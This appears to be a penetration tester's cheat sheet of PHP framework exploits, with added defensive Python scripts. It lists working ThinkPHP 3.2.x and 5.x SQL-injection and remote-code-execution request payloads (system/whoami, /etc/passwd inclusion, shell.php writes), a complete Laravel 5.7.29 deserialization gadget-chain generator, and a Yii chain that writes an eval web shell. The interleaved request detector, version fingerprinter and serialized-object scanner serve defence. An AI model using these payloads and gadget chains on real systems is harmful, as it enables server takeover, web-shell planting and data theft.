CMS

Exploit Database: https://www.exploit-db.com/


Compare source trees: diff -r DirA DirB

ThinkPHP

  • Version

    Keyword: THINK_VERSION

  • 3.2.x

    Log: <domain>/Application/Runtime/Logs/Home/21_04_27.log

    • Generic

    • 3.2.3

      • SQL error-based injection

        http://server/index.php?m=Home&c=Index&a=index2&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23

        http://server/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1) %23

        http://server/index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1

      • Variable override

        empty($_content)?include $templateFile:eval('?>'.$_content);

  • 5.0.x

    • 5.0.7<=ver<=5.0.22

      • RCE when forced routing is not enabled

        ?s=index/think\config/get&name=database.username

        ?s=index/\think\Lang/load&file=../../test.jpg

        ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

    • <5.0.23

      Analysis of the ThinkPHP 5.0.0~5.0.23 RCE caused by arbitrary method invocation on the Request class

      • RCE

        http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

        http://server/index.php?s=captcha POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

        http://server/index.php?s=index/index POST: _method=__construct&filter[]=system&method=GET&get[]=whoami

      • Arbitrary file inclusion

        http://server/index.php?s=captcha POST: _method=__construct&method=GET&filter[]=think\__include_file&server[]=1&get[]=/etc/passwd

    • <5.0.12

      • RCE

        http://server/index.php?s=index/index POST: _method=__construct&filter[]=system&method=POST&s=whoami

    • 5.0.21-5.0.23

      • RCE

        http://server/index.php?s=captcha POST: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

    • 5.0.24

  • 5.1.x

    • Generic

      • RCE when forced routing is not enabled

        ?s=index/\think\Request/input&filter[]=system&data=pwd

        ?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>

        ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>

        ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

        ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

    • 5.1.31

      • RCE

        http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
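
Every payload in this section travels in the query string or a form body, so the shapes above are what a defender can match on. The Python below is an added example (not from these notes or from ThinkPHP): it URL-decodes a request line plus body and runs a small set of rules derived from the patterns listed in this section over constructed sample requests. The request tuples are constructed here, and the body is only available if your reverse proxy or WAF logs it (assumption).

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Each rule is (name, regex) and is matched against the URL-decoded request
# target plus body. The patterns mirror the payload shapes in the notes above.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    # s= routing straight to a framework class (\think\app, \think\Container, \think\Request, ...)
    ("internal_class_route", re.compile(r"[?&]s=[^&]*\bthink\\", re.I)),
    ("invokefunction", re.compile(r"invokefunction", re.I)),
    ("call_user_func_array", re.compile(r"function=call_user_func_array|vars\[0\]=system", re.I)),
    # Request method override plus filter[] callback (5.0.x variants)
    ("method_override_construct", re.compile(r"_method=__construct", re.I)),
    ("filter_callback", re.compile(r"filter\[\]=", re.I)),
    # 3.2.3 array-parameter injection: id[where]=, x[0]=exp, x[0]=bind
    ("tp3_array_param_injection", re.compile(r"\[where\]=|\[0\]=(?:exp|bind)\b", re.I)),
    ("updatexml_error_injection", re.compile(r"updatexml\s*\(", re.I)),
    # Template/view driver abuse carrying PHP source, and Lang/load traversal
    ("php_tag_in_param", re.compile(r"<\?php", re.I)),
    ("path_traversal", re.compile(r"\.\./")),
]


def scan_request(method: str, target: str, body: str = "") -> List[str]:
    """Return the names of every rule the request triggers after one URL-decoding pass."""
    haystack = unquote_plus(target)
    if body:
        haystack += "&" + unquote_plus(body)
    return [name for name, rx in RULES if rx.search(haystack)]


def scan(requests: List[Tuple[str, str, str]]) -> Dict[int, List[str]]:
    """Map request index -> triggered rules, for flagged requests only."""
    findings: Dict[int, List[str]] = {}
    for i, (method, target, body) in enumerate(requests):
        hits = scan_request(method, target, body)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample traffic (method, target, body); not captured from a real host.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("GET", "/index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array"
            "&vars[0]=system&vars[1][]=id", ""),
    ("POST", "/index.php?s=captcha", "_method=__construct&filter[]=system&method=GET&get[]=whoami"),
    ("GET", "/index.php?m=Home&c=Index&a=index2&id[where]=1%20and%20updatexml"
            "(1,concat(0x7e,user(),0x7e),1)%20%23", ""),
    ("GET", "/index.php?s=index/%5Cthink%5CLang/load&file=../../test.jpg", ""),
    ("GET", "/index.php?s=index/index&page=2", ""),
    ("POST", "/index.php?s=index/index", "username=alice&password=hunter2"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {', '.join(hits)}")
```

The rules are shape-based and decode a single layer, so a double-encoded request slips past; treat a hit as a trigger to pull the full request, not as proof of exploitation. On the application side the fix for the routing variants is upgrading and turning forced routing on (`url_route_must` in the ThinkPHP 5 config) so `s=` can no longer select an arbitrary class.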

Laravel

  • Version

    vendor/laravel/framework/src/Illuminate/Foundation/Application.php

  • 5.7.x

    • 5.7.29

      • Deserialization + RCE

        <?php
        // Generator for the chain; this variant does not go through PendingCommand.php
        namespace Symfony\Component\Routing\Loader\Configurator {
            // Entry point: $parent is reached from ImportConfigurator's destructor,
            // which calls a method on it and so lands in ValidGenerator::__call
            class ImportConfigurator
            {
                private $parent;
                public function __construct($parent)
                {
                    $this->parent = $parent;
                }
            }
        }

        namespace Faker {
            // Any method call returns the stored value (the command string)
            class DefaultGenerator
            {
                protected $default;
                public function __construct($default)
                {
                    $this->default = $default;
                }
                public function __call($method, $attributes)
                {
                    return $this->default;
                }
            }
            // __call forwards to the generator, then runs $validator on the result
            class ValidGenerator
            {
                protected $generator;
                protected $validator;
                protected $maxRetries;
                public function __construct($validator, $generator)
                {
                    $this->generator = new DefaultGenerator($generator);
                    $this->validator = $validator;
                    $this->maxRetries = 1;
                }

                public function __call($name, $arguments)
                {
                    $i = 0;
                    do {
                        $res = call_user_func_array(array($this->generator, $name), $arguments);
                        $i++;
                        if ($i > $this->maxRetries) {
                            throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
                        }
                    } while (!call_user_func($this->validator, $res));

                    return $res;
                }
            }
        }

        namespace {
            $a = new Faker\ValidGenerator("system", "cat /flag");
            $b = new Symfony\Component\Routing\Loader\Configurator\ImportConfigurator($a);
            echo urlencode(serialize($b));
        }
  • 8.1
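
To tell quickly whether a deployment falls into one of the version ranges listed for ThinkPHP and Laravel above, the Python below is an added example (not from these notes or from either framework). It reads the version marker the notes point at (THINK_VERSION, or the VERSION constant in Illuminate/Foundation/Application.php) and compares it against the ranges exactly as this page lists them. The file contents it scans are constructed samples, and accepting both the `const` and the `define()` spelling of THINK_VERSION is an assumption about how different ThinkPHP branches declare it.

```python
import re
from typing import Dict, List, Optional, Tuple

# Version markers from the notes above. Both spellings of THINK_VERSION are
# accepted (assumption: the spelling depends on the ThinkPHP branch).
VERSION_PATTERNS: Dict[str, List["re.Pattern[str]"]] = {
    "ThinkPHP": [
        re.compile(r"const\s+THINK_VERSION\s*=\s*['\"]([^'\"]+)['\"]"),
        re.compile(r"define\(\s*['\"]THINK_VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)"),
    ],
    "Laravel": [re.compile(r"const\s+VERSION\s*=\s*['\"]([^'\"]+)['\"]")],
}

# Affected ranges as the notes list them. Bounds are inclusive; a two-component
# bound such as "5.1" means "any 5.1.x".
AFFECTED: List[Tuple[str, str, str, str]] = [
    ("ThinkPHP", "3.2.3", "3.2.3", "3.2.3: SQL error-based injection, variable override"),
    ("ThinkPHP", "5.0.7", "5.0.22", "5.0.7<=ver<=5.0.22: RCE when forced routing is off"),
    ("ThinkPHP", "5.0.0", "5.0.22", "<5.0.23: Request method abuse (RCE, arbitrary file inclusion)"),
    ("ThinkPHP", "5.0.0", "5.0.11", "<5.0.12: RCE via _method=__construct with method=POST"),
    ("ThinkPHP", "5.0.21", "5.0.23", "5.0.21-5.0.23: RCE via server[REQUEST_METHOD]"),
    ("ThinkPHP", "5.1", "5.1", "5.1.x: RCE when forced routing is off"),
    ("ThinkPHP", "5.1.31", "5.1.31", "5.1.31: invokefunction RCE"),
    ("Laravel", "5.7.29", "5.7.29", "5.7.29: deserialization + RCE"),
]


def parse_version(text: str) -> Tuple[int, ...]:
    """'5.1.41 LTS' -> (5, 1, 41); non-numeric suffixes are ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", text))


def fingerprint(framework: str, source: str) -> Optional[str]:
    """Extract the version string from the framework file the notes name."""
    for pattern in VERSION_PATTERNS.get(framework, []):
        m = pattern.search(source)
        if m:
            return m.group(1).strip()
    return None


def in_range(version: Tuple[int, ...], lo: str, hi: str) -> bool:
    """Inclusive comparison on as many components as each bound specifies."""
    lo_t, hi_t = parse_version(lo), parse_version(hi)
    return version[: len(lo_t)] >= lo_t and version[: len(hi_t)] <= hi_t


def affected_entries(framework: str, version: str) -> List[str]:
    """Every note entry whose range contains this version."""
    v = parse_version(version)
    return [note for fw, lo, hi, note in AFFECTED if fw == framework and in_range(v, lo, hi)]


# Constructed sample file contents; not taken from any real deployment.
SAMPLE_FILES: Dict[str, str] = {
    "ThinkPHP": "<?php\n// constructed: 5.0-style marker\ndefine('THINK_VERSION', '5.0.22');\n",
    "Laravel": "<?php\nnamespace Illuminate\\Foundation;\nclass Application {\n"
               "    const VERSION = '5.7.29';\n}\n",
}

if __name__ == "__main__":
    for fw, content in SAMPLE_FILES.items():
        ver = fingerprint(fw, content)
        print(fw, ver, affected_entries(fw, ver) if ver else "version marker not found")
```

The range table is deliberately a transcription of the bullets above, so when the notes are extended the table is the only thing to update; the match is on version alone and says nothing about whether forced routing or debug mode is actually enabled on the host, which is why a hit should be confirmed against the deployment's configuration.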

Yii

  • Version

    a. Create a TestController.php controller in the controllers directory, put <?php echo Yii::getVersion(); ?> in it, then request the test controller's index action in the Yii project: index.php?r=test

    b. /vendor/yiisoft/yii2/BaseYii.php

  • 2.0.x

    • <2.0.37

      • Deserialization

        a. yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

        b. yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\CreateAction::run()

        c.

        <?php
        namespace yii\rest{
            // Final sink: run() calls $checkAccess with $id, i.e. assert() on the string below
            class IndexAction{
                public $checkAccess;
                public $id;
                public function __construct(){
                    $this->checkAccess = 'assert';
                    $this->id = 'file_put_contents("1.php","<?php eval(\$_POST[0]);?>");exit();';
                }
            }
        }
        namespace yii\db{
            use yii\web\DbSession;
            // Entry point: __destruct() touches $_dataReader, which is the DbSession below
            class BatchQueryResult
            {
                private $_dataReader;
                public function __construct(){
                    $this->_dataReader=new DbSession();
                }
            }
        }
        namespace yii\web{
            use yii\rest\IndexAction;
            // writeCallback is invoked as a callable, landing in IndexAction::run()
            class DbSession
            {
                public $writeCallback;
                public function __construct(){
                    $a=new IndexAction();
                    $this->writeCallback=[$a,'run'];
                }
            }
        }
        namespace{
            use yii\db\BatchQueryResult;
            echo base64_encode(serialize(new BatchQueryResult()));
        }
  • 2.0.38

    • Deserialization

      a. Codeception\Extension\RunProcess::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

      b. Swift_KeyCache_DiskKeyCache -> phpDocumentor\Reflection\DocBlock\Tags\See::__toString()-> Faker\Generator::__call() -> yii\rest\IndexAction::run()
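
The Laravel 5.7.29 chain and all of the Yii chains above begin with unserialize() of attacker-controlled data, so the thing to watch at the edge is a PHP-serialized object arriving in a parameter, cookie or body, usually URL- or base64-encoded. The Python below is an added example (not from these notes, Laravel or Yii) that peels those encodings, extracts class names from `O:len:"Class"` markers, and flags the gadget classes named in the Laravel and Yii sections together with the `system`/`assert` callables the chains rely on. The sample request and the serialized blobs inside it are constructed for the demonstration; their property values are placeholders, not a working chain.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import quote, unquote_plus

# Classes that appear in the gadget chains listed in the Laravel and Yii notes above
# (lower-cased for comparison).
GADGET_CLASSES = {
    "symfony\\component\\routing\\loader\\configurator\\importconfigurator",
    "faker\\validgenerator",
    "faker\\defaultgenerator",
    "faker\\generator",
    "yii\\db\\batchqueryresult",
    "yii\\web\\dbsession",
    "yii\\rest\\indexaction",
    "yii\\rest\\createaction",
    "codeception\\extension\\runprocess",
    "swift_keycache_diskkeycache",
    "phpdocumentor\\reflection\\docblock\\tags\\see",
}

PHP_OBJECT = re.compile(r'O:\d+:"([^"]+)":\d+:\{')        # O:len:"Class":n:{
PHP_CALLABLE = re.compile(r's:\d+:"(system|assert)";')    # callbacks used by the chains above


def decode_layers(value: str) -> List[str]:
    """Return the raw value plus its URL-decoded and base64-decoded views."""
    layers = [value]
    decoded = unquote_plus(value)
    if decoded != value:
        layers.append(decoded)
    for candidate in list(layers):
        try:
            raw = base64.b64decode(candidate.strip(), validate=True)
        except (binascii.Error, ValueError):
            continue
        layers.append(raw.decode("latin-1"))   # serialized PHP may contain NUL bytes
    return layers


def inspect_value(value: str) -> Optional[Dict]:
    """Report serialized PHP objects in a single parameter value, or None."""
    classes: List[str] = []
    callables: List[str] = []
    for layer in decode_layers(value):
        for m in PHP_OBJECT.finditer(layer):
            if m.group(1) not in classes:
                classes.append(m.group(1))
        for m in PHP_CALLABLE.finditer(layer):
            if m.group(1) not in callables:
                callables.append(m.group(1))
    if not classes:
        return None
    known = [c for c in classes if c.lower() in GADGET_CLASSES]
    verdict = "gadget_chain" if known else "serialized_object"
    return {"verdict": verdict, "classes": classes, "gadget_classes": known, "callables": callables}


def inspect_request(params: Dict[str, str]) -> Dict[str, Dict]:
    """Run inspect_value over every parameter; keys are the flagged parameter names."""
    return {name: r for name, value in params.items() if (r := inspect_value(value))}


# Constructed serialized blobs shaped like the two chains above (placeholder values).
SAMPLE_YII = (
    'O:23:"yii\\db\\BatchQueryResult":1:{'
    's:36:"\x00yii\\db\\BatchQueryResult\x00_dataReader";O:17:"yii\\web\\DbSession":1:{'
    's:13:"writeCallback";a:2:{i:0;O:20:"yii\\rest\\IndexAction":2:{'
    's:11:"checkAccess";s:6:"assert";s:2:"id";s:4:"demo";}i:1;s:3:"run";}}}'
)
SAMPLE_LARAVEL = (
    'O:64:"Symfony\\Component\\Routing\\Loader\\Configurator\\ImportConfigurator":1:{'
    's:72:"\x00Symfony\\Component\\Routing\\Loader\\Configurator\\ImportConfigurator\x00parent";'
    'O:20:"Faker\\ValidGenerator":3:{s:12:"\x00*\x00generator";O:22:"Faker\\DefaultGenerator":1:{'
    's:10:"\x00*\x00default";s:4:"demo";}s:12:"\x00*\x00validator";s:6:"system";'
    's:13:"\x00*\x00maxRetries";i:1;}}'
)

# Constructed request parameters: two benign values, one base64 cookie, one URL-encoded body field.
SAMPLE_REQUEST: Dict[str, str] = {
    "page": "2",
    "token": "eyJ1c2VyIjoiYm9iIn0=",   # base64 of a JSON object, benign
    "cookie_session": base64.b64encode(SAMPLE_YII.encode()).decode(),
    "payload": quote(SAMPLE_LARAVEL),
}

if __name__ == "__main__":
    for name, finding in inspect_request(SAMPLE_REQUEST).items():
        print(name, finding["verdict"], finding["gadget_classes"], finding["callables"])
```

A `serialized_object` verdict on its own is already worth an alert, since a web application rarely has a reason to accept serialized PHP from a client; the gadget list only raises the priority. At the application level the durable fix is not to call unserialize() on client data at all, and where it cannot be avoided, to pass `['allowed_classes' => false]` (PHP 7.0+) so no object is instantiated.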

Joomla!